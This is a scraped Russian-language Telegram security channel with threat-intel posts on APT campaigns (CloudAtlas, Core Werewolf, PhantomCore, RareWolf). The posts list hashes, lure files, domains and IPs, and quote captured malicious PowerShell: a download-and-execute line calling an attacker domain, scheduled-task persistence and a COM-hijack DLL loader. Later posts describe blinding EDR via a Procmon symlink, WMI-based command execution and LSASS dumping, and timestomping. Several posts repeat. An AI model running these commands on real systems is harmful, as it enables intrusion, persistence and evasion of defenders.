Продолжаем хантить any run
#APT
#CloudAtlas
istochnik[.]org
Заявка_количество на поставку корпусов АО АМЗ.pdf.lnk
Счет_a19af3ed-a30a-45a0-b88d-6529f94398d4.pdf.lnk
2e7871b4cad8c77c1b7d7d430195470ee89ee15429ec3f32009d904e564595c6
81f26d8ad99ab743f97bfbaae0f260ef6d96b3b9eab2613622e6b0bd0032709e
2ad7e07a86784f22bc0fa400f433fc905aa49506b1cb629192d3c0b718cae372
d2d77c457dffd42942098f57b80a1e557879d4706d5bb96fd69c5896edfb60ea
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w Minimized -ep Bypass -nop -c "ieX(irm hxxps://istochnik.org/male-infertility/isoflor -UserAgent 'Mozilla/4.0 (compatible; Windows NT 10.0; ms-office; MSOffice 16)') "
#APT
#CloudAtlas
APT Core Werewolf
#CoreWerewolf
areanc.info
45.128.148.246
WinVNC.exe
f7d4080ad8259b0aac2504f8b5d8fab18e5124321c442c8bcb577598059d0b24
Transmartian.rar
b49e9759e529158aff7d81081f0f5242bc741873fb0fe414b475c4b6c83360ee
reflexiveness.exe
1ae5b8e4ba349292edf062d4173d8ebf25701b7b540eb2509b165fd219a0d4e7
LEnfant.rar
5f225c7f9f81d78b2ee45ec1eeb305d009631748bb2537b3376d7cd3390ad811
metroliners.cmd
2b5da54a8a94dd15dd7a5d53bf17d8df7856154fc9b20160867efe29a7c0501a
camass.bat
560404f3b5ffc52db8260b29dc3716e510261191f0a68152729c0387c376919b
tonguetaw
9448D1A7EAC7112EC68964EABC71134B14727BEC3C13882D8B1C869C5DC3A8F7
solehappy.bat
3bb64031a9f2be48b427fa143e0b3f7f12f032470f0d3a8e433692c43642e966
Документ приманка
542dc17c81ee391cf3db3afe41aac02ba31ec1fc56a3ec093ace7800b895bc64
TTP
"C:\Users\admin\AppData\Local\Temp\\intracoelomic.exe" e C:\Users\admin\AppData\Local\Temp\\Transmartian.rar -o C:\Users\admin\AppData\Local\Temp\ -pKKGEAP5SVMZ -y
"cmd" /c start "" "C:\Users\admin\AppData\Local\Temp\\Отсканированые документы - по ВСО заключение по запросу на начальника службы бпла - копия-1 (4).pdf" & C:\Users\admin\AppData\Local\Temp\\metroliners.cmd
C:\Users\admin\AppData\Local\Temp\intracoelomic.exe e C:\Users\admin\AppData\Local\Temp\LEnfant.rar -o C:\Users\Public\Downloads\ -pKKGEAP5SVMZ -y
C:\WINDOWS\System32\conhost.exe --headless powershell -ExecutionPolicy Bypass -Command "& { $chitchatted = New-Object -ComObject Schedule.Service; $chitchatted.Connect(); $Barnabe = $chitchatted.GetFolder('\'); $nectarise = $chitchatted.NewTask(0); $nectarise.Settings.Enabled = $true; $nectarise.Settings.StopIfGoingOnBatteries = $false; $nectarise.Settings.DisallowStartIfOnBatteries = $false; $nectarise.Settings.AllowDemandStart = $true; $atticists = $nectarise.Triggers.Create(2); $atticists.StartBoundary = ('2023-03-27T07:45:55'); $atticists.Repetition.Interval = 'PT11M'; $atticists.Repetition.Duration = 'P1D'; $Ganymeda = $nectarise.Actions.Create(0); $Ganymeda.Path = 'C:\WINDOWS\System32\conhost.exe'; $Ganymeda.Arguments = '--headless C:\Users\Public\Downloads\camass.bat'; $Barnabe.RegisterTaskDefinition('UsbDefault-Notification-UDNP-25852kf25383-25293i', $nectarise, 6, $null, $null, 3); }"
#CoreWerewolf
APT Core Werewolf
#CoreWerewolf
madebysbk.com
193.238.152.128
subbasaltic.rar
179831492da2ed8d9771e5a1fce4615deb0618d6977bd2a5953ebe67352df890
ejective.rar
49405126b9734d1784a0f4a49f3ddc28b5945c53e1079f83cc026de6f107c8b1
tassellus.cmd
b05e25dc7da1139d8731ca282572799168666708f8eb7201edd38999ea3db0b2
sorgho.bat
864f3bc5fc80ebb58c69f7715875742a0d7746ff4cef79d4031f061262e46fd1
Hasmonean.bat
081c65e07fe4958078ba7b09050fdb3fb8cbd1d59c91bd5d8147057c4c21c1b5
Clockville.exe
c868049d2cce5a00a0e7a72620d9e77e289a394fc7e8def67508273f1c614240
TTP
"C:\Users\admin\AppData\Local\Temp\\angilo.exe" e C:\Users\admin\AppData\Local\Temp\\subbasaltic.rar -o C:\Users\admin\AppData\Local\Temp\ -pr7vwjMN2Npq -y
C:\Users\admin\AppData\Local\Temp\angilo.exe e C:\Users\admin\AppData\Local\Temp\ejective.rar -o C:\Users\Public\Downloads\ -pr7vwjMN2Npq -y
C:\WINDOWS\System32\conhost.exe --headless powershell -ExecutionPolicy Bypass -Command "& { $nucule = New-Object -ComObject Schedule.Service; $nucule.Connect(); $scorchers = $nucule.GetFolder('\'); $unconformed = $nucule.NewTask(0); $unconformed.Settings.Enabled = $true; $unconformed.Settings.StopIfGoingOnBatteries = $false; $unconformed.Settings.DisallowStartIfOnBatteries = $false; $unconformed.Settings.AllowDemandStart = $true; $darkeners = $unconformed.Triggers.Create(2); $darkeners.StartBoundary = ('2023-03-27T07:45:55'); $darkeners.Repetition.Interval = 'PT11M'; $darkeners.Repetition.Duration = 'P1D'; $tjaele = $unconformed.Actions.Create(0); $tjaele.Path = 'C:\WINDOWS\System32\conhost.exe'; $tjaele.Arguments = '--headless C:\Users\Public\Downloads\sorgho.bat'; $scorchers.RegisterTaskDefinition('RtkAudUService64_BG-25740ld25025-25362m', $unconformed, 6, $null, $null, 3); }"
#CoreWerewolf
IOC'S
Отправитель: mtk.kr@inbox[.]ru
195.2.78[.]133
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.rar
8722D5B97208398B93D7B2DB8C65818CD43D93A68E11E220A889E8270E628BD1
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe
6B290953441B1C53F63F98863AAE75BD8EA32996AB07976E498BAD111D535252
IOC'S FROM TI
Сигнатура по трафику:
ET MALWARE Rainbow Hyena Backdoor PhantomRemote (poll) C2 Traffic
#PhantomCore
Задание_на_оценку_N_2046_от_05_августа_2025_года[.]zip
SHA256: 66dd68177a5b31159579cfcab558771097d753a17b63c1cbf4dadc2f5c4f0e2e
Задание_на_оценку_N_2046_от_05_августа_2025_года.pdf.lnk
SHA256: B9579E65E5499BE393CF182496103941A006479FF8B41C0AD3B57B1D678D9794
Вредонос: winnt64_.dll (PhantomRemote)
SHA256: D585AA73D28AF621ABCEF44AE024FDE62366C29F5730A3CB31FF3C8BB5EB84A8
Сигнатура по трафику:
ET MALWARE Rainbow Hyena Backdoor PhantomRemote (poll) C2 Traffic
31.58.171[.]246
#PhantomCore
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}else{$f=$(gci -Path $env:USERPROFILE -Recurse -File|where{$_.Name -like 'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip'}|select -First 1); if($f){$r=$f.FullName;[System.IO.File]::WriteAllBytes('C:\ProgramData\winnt64_.dll',([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}};if(-Not (Test-Path $r)){$r=$(gci -Path $env.TEMP -Recurse -File|where {$_.Name -like 'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip'}|select -First 1).FullName};[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:TEMP,'C:\sponge-bob\exe-zip-injector\Задание_на_оценку_N_2046_от_05_августа_2025_года.pdf'),([System.IO.File]::ReadAllBytes($r)|select -Skip 642064 -First 225723));start $([System.IO.Path]::Combine($env:TEMP, 'C:\sponge-bob\exe-zip-injector\Задание_на_оценку_N_2046_от_05_августа_2025_года.pdf'));#PhantomCore
IOC'S FROM TI
IP-адреса различные, но все висят на AS 56971 ( Cgi Global Limited исходя из данных VT)
Также одинаково название dll, его расположение, и способ закрепления.
#PhantomCore
i.getmantsev@orenklip[.]ru
Заказ_на_ДПЭ_225.zip
SHA256: 5265332860D0C81A5687F75D836441E5E1F45EB98E6DEA6E3D8830D70C97783A
Заказ_на_ДПЭ_225.pdf.lnk
SHA256: D9EADCBAB4703094481EF388F4F639223D66FFA42EBD4DA1037AA79B5BF87C4A
C:\ProgramData\winnt64_.dll
SHA256: 3FB7F5B2504386EAB868C6C4001E08787F13F3D915D1F25876C9192266A67549
C2
31.57.61[.]137
IP-адреса различные, но все висят на AS 56971 ( Cgi Global Limited исходя из данных VT)
Также одинаково название dll, его расположение, и способ закрепления.
#PhantomCore
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Заказ_на_ДПЭ_225.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}else{$f=$(gci -Path $env:USERPROFILE -Recurse -File|where{$_.Name -like 'Заказ_на_ДПЭ_225.zip'}|select -First 1); if($f){$r=$f.FullName;[System.IO.File]::WriteAllBytes('C:\ProgramData\winnt64_.dll',([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}};if(-Not (Test-Path $r)){$r=$(gci -Path $env.TEMP -Recurse -File|where {$_.Name -like 'Заказ_на_ДПЭ_225.zip'}|select -First 1).FullName};[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:TEMP,'C:\sponge-bob\exe-zip-injector\Заказ_на_ДПЭ_225.pdf'),([System.IO.File]::ReadAllBytes($r)|select -Skip 642064 -First 704747));start $([System.IO.Path]::Combine($env:TEMP, 'C:\sponge-bob\exe-zip-injector\Заказ_на_ДПЭ_225.pdf'));
#PhantomCore
Хэши новые домен известный ранее.
#APT RareWolf
Пакет документов по Дополнительному соглашению к Договору №513402-2025.rar
EAEEDFE9958399F220A0EC793135EA96880D47E8AA0EDF271623A55A9DF79A05
Калькуляция.xlsx
4734444DE2B506360FAF17B1348DADAA07C1CB3734866AE23705D4C8AFDE4D22
Документы по Дополнительному соглашению к Договору №513402-2025.scr
C2A856E66469F64DCD3351B56AD1C61D0DB0488C7248BC3C05DF2EDF7E212BE2
email-office[.]ru
#APT RareWolf
IOC'S
Уведомление №221 о начале комплексной проверки согласно плану утечек8.exe
autovekb96[.]ru
82f5e455ebce674b4382bf2e7d0c58d67a11af3f861ea4ee1c431013d5ffe85e
Как за пару кнопок убить AV/EDR (разных цветов)
Из требований:
- Наличие прав админа на тачке;
- Возможность доставки procmon.
А далее всё более чем прозаично.
1. Включение функции "EnableBootLooging";
2. Создание символической ссылки:
3. Ребут тачки.
Получаем магию.
Подробнее:
https://www.zerosalarium.com/2025/01/byovd%20next%20level%20blind%20EDR%20windows%20symbolic%20link.html?m=1
Из требований:
- Наличие прав админа на тачке;
- Возможность доставки procmon.
А далее всё более чем прозаично.
1. Включение функции "EnableBootLooging";
2. Создание символической ссылки:
mklink C:\Windows\Procmon.pmb "<Полный путь до файла который требуется перезаписать>"
3. Ребут тачки.
Получаем магию.
Подробнее:
https://www.zerosalarium.com/2025/01/byovd%20next%20level%20blind%20EDR%20windows%20symbolic%20link.html?m=1
Forwarded from 1N73LL1G3NC3
Win32_Process has been the go to WMI class for remote command execution for years. In this post we will cover a new WMI class that functions like Win32_Process and offers further capability.
🔗 WMI_Proc_Dump.py
Dump processes over WMI with MSFT_MTProcess
🔗 mtprocess.py
Python script that uses Impacket to use the MSFT_MTProcess WMI class to execute a command. If wanting to use against a Workstation it can install the provider.
P.S. One more way to dump LSASS.
Please open Telegram to view this post
VIEW IN TELEGRAM
Сегодня немножечко про обновление временныхметок в NTFS.
Временные метки $STANDART_INFORMATION (0x10), возможно спокойно изменить, через Powershell из пространства пользователя. Изменение временных меток $FILE_NAME (0x30) происходит на уровне ядра. В случае, если при Timestomping изменить только временные метки $STANDART_INFORMATION (0x10), то будет заметно явное расхождение временных меток при анализе $MFT.
Однако, есть достаточно простые варианты синхронизации временных меток $SI с $FN.
1) Переименование файла;
2) Перемещение файла в другую директорию (однако тут ещё надо менять временные метки самой папки, поэтому такой себе вариант).
На скриншотах 1,2 временные метки создания файла для $SI и $FN, на 3,4 видно расхождение временных меток $SI и $FN после Timestomping. На скриншотах 5,6 видно, что при переименовании файла временные метки синхронизировались.
Да, в данном случае всё равно существуют альтернативные артефакты с помощью которых можно выявить Timestomping, но всё равно это несколько усложняет анализ.
#FORENSIC
Временные метки $STANDART_INFORMATION (0x10), возможно спокойно изменить, через Powershell из пространства пользователя. Изменение временных меток $FILE_NAME (0x30) происходит на уровне ядра. В случае, если при Timestomping изменить только временные метки $STANDART_INFORMATION (0x10), то будет заметно явное расхождение временных меток при анализе $MFT.
Однако, есть достаточно простые варианты синхронизации временных меток $SI с $FN.
1) Переименование файла;
2) Перемещение файла в другую директорию (однако тут ещё надо менять временные метки самой папки, поэтому такой себе вариант).
На скриншотах 1,2 временные метки создания файла для $SI и $FN, на 3,4 видно расхождение временных меток $SI и $FN после Timestomping. На скриншотах 5,6 видно, что при переименовании файла временные метки синхронизировались.
Да, в данном случае всё равно существуют альтернативные артефакты с помощью которых можно выявить Timestomping, но всё равно это несколько усложняет анализ.
#FORENSIC
5